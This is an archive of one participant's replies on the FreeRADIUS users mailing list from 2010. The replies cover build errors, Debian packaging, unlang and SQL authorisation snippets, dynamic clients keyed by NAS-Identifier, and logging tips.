On 2010/09/20 04:01 PM, PENZ Robert wrote: Hi! But thats not the problem. The mac address matches in the SQL statement but I need also to return the mac address to the radius. In this reply the mac address is lower case. And now the radius checks that against its upper case version it gets from the switch. I cannot return the mac always upper case as it would not work with the switches which send the mac lower case. I hope this makes sense. Search this list. The question was asked about 2 months ago. It was answered. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Last call for 2.1.10
On 2010/08/12 09:36 AM, Stefan Winter wrote: /root/freeradius-server-2.1.10-pre/src/lib/.libs/libfreeradius-radius.so -lnsl -lresolv -lpthread -lssl -lcrypto -Wl,-rpath -Wl,/usr/local/freeradius/2.1.10-pre/lib libeap/.libs/libfreeradius-eap.so: undefined reference to `radius_pairmake' collect2: ld returned 1 exit status gmake[6]: *** [radeapclient] Fehler 1 gmake[6]: Leaving directory `/root/freeradius-server-2.1.10-pre/src/modules/rlm_eap' Hi, Debian Lenny. 1) Please remember to update debian/changelog to 2.1.10 2) Same compile error: gcc -o .libs/radeapclient .libs/radeapclient.o libeap/.libs/libfreeradius-eap.so -lnsl -lresolv -lpthread -lssl -lcrypto -Wl,--rpath -Wl,/usr/lib/freeradius libeap/.libs/libfreeradius-eap.so: undefined reference to `radius_pairmake' collect2: ld returned 1 exit status make[7]: *** [radeapclient] Error 1 make[7]: Leaving directory `/usr/src/freeradius-2.1.10-git/freeradius-server/src/modules/rlm_eap' make[6]: *** [rlm_eap] Error 2 Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Last call for 2.1.10
On 2010/08/12 10:02 AM, Alan DeKok wrote: Stefan Winter wrote: libeap/.libs/libfreeradius-eap.so: undefined reference to `radius_pairmake' This was noted the other day. I committed a fix, and just pushed it back to the git repositories. I can confirm that it compiles on Debian Lenny now. Not tested it though. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Of accounting data and security
On 2010/08/09 11:14 PM, Alan DeKok wrote: The accounting data is sent in the clear on a LAN. This shouldn't be a problem. If you're sending accounting data across the Internet, use IPSec. Don't even pretend to use anything else. RADIUS (and TACACS+) security is simply not as good as IPSec. Hi, I've also got a need to implement security in the near furture. I've not started yet, but my problem is that the embedded devices that I use do not have enough flash to install the encryption needed for ipsec. My thinking was to use radsecproxy-freeradius (my nas, coova, supports radsec). Any comments on ipsec vs radsec? Thanks, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius 2.1.9 stop working
On 2010/08/05 11:04 AM, Alan Buxey wrote: 2.1.10 isnt out yet. but when it is, then your package maintainers should ensure a new RPM is available. This page might tell you how to build an RPM from source. http://wiki.freeradius.org/Red_Hat_FAQ Use git as the source. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: suffix configuration
On 2010/08/05 08:17 PM, Sallee, Stephen (Jake) wrote: Does anyone have any input on this? It is kind of a problem for me and I could really use some help : ) realms -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: suffix configuration
On 2010/08/05 08:37 PM, Sallee, Stephen (Jake) wrote: realms ... thank you. Whilst I do appreciate brevity, a single monosyllabic response seems as though it may be a bit too brief : ) Can you elaborate? I am not asking for anyone so solve my problem for me but rather to be pointed in the correct direction. Was hoping you had read all the files in /etc/radiusd (or /etc/freeradius) already. Look at modules/realm This is how you split off domain\user or u...@domain. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Fwd: FreeRadius2MySQL
On 2010/08/04 01:35 PM, Student University wrote: so can please guide me of how i can setup the freeradius 2 with MYSQL to be 100% ready for such production That's easy. All you need to do is read the documentation. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Tag and Untag a port in several VLAN
On 2010/08/03 01:51 PM, Fabien COMBERNOUS wrote: Thank you for your answer. I can't change FreeRadius version. So i need to use decimal number. Can you give me an exemple about to untag a port in vlan 7 ? Just convert 0x320007 to decimal?? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Documentation question
On 2010/07/21 10:37 PM, Alan DeKok wrote: The only reference book available now is the O'Reilly book. I don't recommend it, as I don't think it will help you. What *specifically* are you looking for? The Wiki, documentation, and my http://deployingradius.com/ site contain a lot of information about how the server works, config files, examples, etc. I find the best documentation to also be the doc/ folder as well as the example config files. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: freeradius and ADSL-Agent-Circuit-Id
On 2010/07/20 10:50 PM, Mike wrote: authorize { if %{ADSL-Agent-Circuit-Id} { update request { User-Name := %{ADSL-Agent-Circuit-Id} Password := %{ADSL-Agent-Circuit-Id} } } Make sure that to add the User-Name (ADSL-Agent-Circuit-Id) to radcheck and set the password to the value of ADSL-Agent-Circuit-Id. ++---+++---+ | id | username | attribute | op | value | ++---+++---+ | 226529 | adslagent | Cleartext-Password | := | adslagent | ++---+++---+ This opens up a security hole I wish to avoid - if someone knows what my circuit Id's look like, and that database is used in any context where a user can send an id/password to authenticate that does NOT have ADSL-Agent-Cirtcuit-Id in it, then I've created a bunch of known user id's for the bad guys to use. I am happy having a non-default sql database schema but I think I really need the sql lookup to be being based on ADSL-Agent-Circuit-Id and not User-Name. Mike- - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html How about this: I'm 100% sure my syntax is wrong today (I'm not an unlang master yet), but the idea should work. Opinions? authorize { if %{ADSL-Agent-Circuit-Id} { if (%{sql: select count(*) from CircuitIdList where CircuitId='%{ADSL-Agent-Circuit-Id}'} 1) { Auth-Type = Accept } else { Auth-Type = Reject } } -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: freeradius and ADSL-Agent-Circuit-Id
On 2010/07/21 11:00 AM, Alan DeKok wrote: authorize { ... if (ADSL-Agent-Circuit-Id \ (%{sql: select ...})) { update control { Auth-Type := Accept } } else { reject } } I disagree with the logic slightly. In my opinion it will also be rejected if ADSL-Agent-Circuit-Id does not exist. As fas as I understand, the desireable result is: If the ADSL-Agent-Circuit-Id does *not* exist, normal authentication must happen. If it *does* exist, accept or reject, depending on its value. Would this not work better? authorize { ... if (ADSL-Agent-Circuit-Id) { if (%{sql: select ...}) { update control { Auth-Type := Accept } } else { reject } } } -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FR virtual server question and EAP configuration
On 2010/07/16 12:34 AM, Michal Bruncko wrote: Hello list SSID 1 \ SSID 2 --- AP -- Trunk -- Ruter - FreeRadius SSID 3 / My goal is to configure different security for different SSID through one freeradius with virtual server feature. This is possible, but with ONE virtual server. My first question is, if it's possible to have different FR server configuration per SSID on single Access Point? Yes. But using ONE virtual server. Called-Station-Id in Access-Request with form: radio-mac:ssid. Why dont you use unlang, e.g. (This is pseodo code!!!) if (Called-Station-Id = SSID1) { pap chap } if (Called-Station-Id = SSID2) { pap mschap } It is enough? I have looking for any example for this scenario but whithout any success. Dont do this. Do the above. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: dyndns ff 1.1.7
On 2010/07/16 05:35 PM, Alan DeKok wrote: Otherwise, it's possible check by nas-id?? No. You could try using rlm_raw and dynamic_clients. Configure your dymanic client virtual server like this. client dymamic { ipaddr = 0.0.0.0 netmask = 0 dynamic_clients = dynamic_nas lifetime = 86400 } server dynamic_nas { authorize { update control { FreeRADIUS-Client-IP-Address = %{Packet-Src-IP-Address} FreeRADIUS-Client-Require-MA = no FreeRADIUS-Client-Secret = %{sql: select RadiusSecret from Nas where Identifier='%{raw:NAS-Identifier}'} FreeRADIUS-Client-Shortname = %{Packet-Src-IP-Address} FreeRADIUS-Client-NAS-Type = other FreeRADIUS-Client-Virtual-Server = amobia_hotspot } } } Tables above are my own, so modify the queries. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl version?
On 2010/05/25 10:13 PM, Jan Zacharias wrote: Hey Bjørn, thank you very much! The output is: perl version: v5.10.1 So it's clear that libperl and perl version do match. However if I add a use IO::Socket::INET in the myfile, I still get freeradius: symbol lookup error: /usr/lib/perl/5.10/auto/IO/IO.so: undefined symbol: Perl_Istack_sp_ptr What could be the reason? I run a Linux raw 2.6.32-22-generic #33-Ubuntu SMP Wed Apr 28 13:28:05 UTC 2010 x86_64 GNU/Linux System. Hi, Don't really know enough about libraries, but it could be related to a previous issue I had on debian (issue still exists with 2.1.9) Can you try the following: 1) Make sure freeradius is not already running 2) Start freeradius using as follows: /usr/sbin/freeradius -X Confirm it fails. 3) Now start it like this: LD_PRELOAD=/usr/lib/libperl.so.5.10 /usr/sbin/freeradius -X If the third step works, it is a debian bug. Modify your /etc/init.d/freeradius. Look for: start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $PROGRAM || ret=$? Replace with: LD_PRELOAD=/usr/lib/libperl.so.5.10 start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $PROGRAM || ret=$? Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Version 2.1.9 has been released
On 2010/05/24 12:28 PM, Alan DeKok wrote: This is a stable release, which is intended to fix outstanding bugs. We suggest reading the changelog below, to see if any issues you have encountered are fixed in this release. debian/changelog still contains +git.. Dont know if it is supposed to be fixed. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: authentification
On 2010/05/18 10:47 PM, dorra aa wrote: is there somebody want to tell what's the utility of it? From: dj_dido2...@hotmail.com To: freeradius-users@lists.freeradius.org Subject: authentification Date: Tue, 18 May 2010 19:40:28 + hi freeradius, i want to ask how to use MAC Address Authentication in my freeradius. besides, i add an address mac with the daloradius. how can i test the succes of that thnak you Have a look here. http://catb.org/~esr/faqs/smart-questions.html Also here. http://catb.org/~esr/faqs/smart-questions.html#homework -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: COA default configuration...Need help to test radclient
On 2010/05/15 08:28 AM, Alan DeKok wrote: ... Do I have to do anything more than any default configuration? In 2.1.8, there's an example CoA server in raddb/sites-available/coa The coa example was missing from 2.1.8. Please have a look here. http://github.com/alandekok/freeradius-server/blob/master/raddb/sites-available/coa -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Pending release of 2.1.9
On 2010/05/14 07:46 AM, Alan DeKok wrote: Johan Meiring wrote: There is a log of warnings though. Small subset says this. - dpkg-shlibdeps: warning: symbol radlog used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries. It's in the server core. There's no libfreeradius-server.so, though perhaps there could be. In any case, the warnings are minor. Cool. I compiled the server and can confirm it runs ok on my develepment machine. On another note, every time a new release comes out, I manually add rlm_raw and recompile. I updated rlm_raw to work with FR2 a while ago and have been running it successfully in production for about a year. Any chance of getting it into the 2_1_0 branch? Patch attached. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 rlm_raw_patch.gz Description: GNU Zip compressed data - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Pending release of 2.1.9
On 2010/05/14 10:35 AM, Alan DeKok wrote: Johan Meiring wrote: The dynamic clients' code runs modules before the packet is decoded... but that's only because it doesn't *receive* the packet. So any raw access to the packet will return nothing. What are you doing with the module? I can't for the life of me see why it would be useful in *any* situation. Its dynamic clients. I use it inside dynamic clients to look up the client via the Nas-Identifier. My clients don't have fixed IPs. The only way to give different Nas's different shared secrets is by doing this. You made a modification to dynamic clients a while ago where you could get hold of the whole packet inside dynamic clients. Dont know if you remember this. You sent a mail to me about it on Wed, 27 May 2009 14:05:31 +0200 SNIP=== I've made some changes in revision control that should help you. The dynamic client virtual server will now receive the *full* RADIUS packet. Before, it was impossible to look at the contents. You will *still* need to use the rlm_raw module to look at the raw packet contents. The contents are *not* decoded into attributes, as happens when receiving normal packets. See http://git.freeradius.org/pre for a tar file that contains the code changes. You will need to add rlm_raw to the build. But after that, something like the following should work: authorize { ... if (%{raw:NAS-Identifier} == foo) { ... } ... } SNIP=== It is definately usefull to me! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Pending release of 2.1.9
On 2010/05/14 11:08 AM, Johan Meiring wrote: Its dynamic clients. Alan, I just saw you were cc-ed on the mail sent to this list. Not intentional. I know you hate it. I always use reply-to-all as a habit. It then replied to you as well. Apologies -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Pending release of 2.1.9
On 2010/05/13 12:57 PM, Alan DeKok wrote: I've put pre releases of 2.1.9 on the web: http://git.freeradius.org/pre/ Please try them, and note any issues. If there aren't problems, we can release 2.1.9 real soon now. Builds fine on debian lenny using dpkg-buildpackage There is a log of warnings though. Small subset says this. - dpkg-shlibdeps: warning: symbol radlog used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries. dpkg-shlibdeps: warning: symbol cf_section_parse used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries. dpkg-shlibdeps: warning: symbol debug_flag used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries. dpkg-shlibdeps: warning: symbol rad_malloc used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries. dpkg-shlibdeps: warning: symbol log_debug used by debian/freeradius/usr/lib/freeradius/rlm_checkval-2.1.9.so found in none of the libraries. - The warnings above also happen for other modules. rlm_mysql rlm_pam rlm_dbm etc.. After building I end up with various packages. freeradius-common freeradius-mysql etc When building previous versions (tried 2.1.7), the packages were different. freeradius(note - no -common) freeradius-mysql etc I realise the official debian packages has a freeradius and a freeradius-common, but the debian packages built from source never had a -common. When installing 2.1.9, I installed the -common instead of the non -common one. When trying to install freeradius-mysql afterwards, it complained about not finding dependency freeradius (without -common). There is something wrong with the package names. Also, the version in debian/changelog still contains git. Hope that helps. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Pending release of 2.1.9
On 2010/05/13 07:16 PM, Josip Rodin wrote: Simply install *both* packages, like the dependencies tell you to... OOPS... Idiot mode. I didn't look properly. The one without -common *does* exist. Apologies for time wasting.. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Is this Install Guide Complete?
On 2010/04/30 11:02 PM, Huckle Berry wrote: I don't see how having newer versions of perl/python could be an issue. As far as SSL is concerned, see below, as this server will be wiped soon. The problem is that newer versions could have bugs. Stable distributions are much better. The problem is now IMHO an 'invalid guide' to install a later version is out there. I realize that you might your server soon, but others (that may not wipe their server soon), may try this. The backports route is still better. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: radiusd does not logging while debug
On 2010/04/22 06:45 PM, Alan DeKok wrote: kes-...@yandex.ru wrote: Hi, FreeRadius. How to force radiusd -X to do logging to log file too? $ radiusd -X /var/log/radius/radius.log 21 Or for both file and console. radiusd -X 21 | tee /var/log/radius/radius.log -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Using Nas IP Adress as client key
Hi all, The radius spec currently identifies a Nas (client) by the Nas's IP address (Packet-Src-Ip-Addres?). That is how radius works. We have a bunch of hotspots out in the field which could be behind any kind of internet connection. Broadband/Dynamic IP, natted, etc. Because we have no idea where a spesific Nas's traffic might come from we've implemented dynamic-clients. Using rlm_raw we use the Nas-Identifier to lookup the shared secret in a database, and the client gets dynamically created. (Thanks Alan for the help with this one!!) This works very well, but has a few irritating (not showstopping) side effects. 1) Sometimes we have more than one Nas behind the same natted connection. This means that they all have to have the same shared secret. 2) Also it happens that a different Nas ends up behind a previous Nas's IP (dynamically assigned broadband IP) and then the shared secret is again rejected. Within a corporate/large telco's network, the Nas's (802.11x switches or Dslams) are generally behind fixed IPs, but for the hotspot world any Nas source IP goes. Is it not a maybe a good idea to start considering a different key to identify the Nas by. In clients.conf (or for dynamic clients) a paramter (nas-key) that could be Src-IP or Nas-Id. i.e. you can choose the key that identifies a spesific Nas/client and therefore the shared secret. Does it sound like a bad idea? How difficult would such a change in Freeradius be? (I've not read the source code yet, just throwing an idea out there). Opinions? PS: I realise that tunneling the radius traffic is a different solution to the same problem, but in our case not always easy to implement. (The only extra layer I would love to see is RadSec.) -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html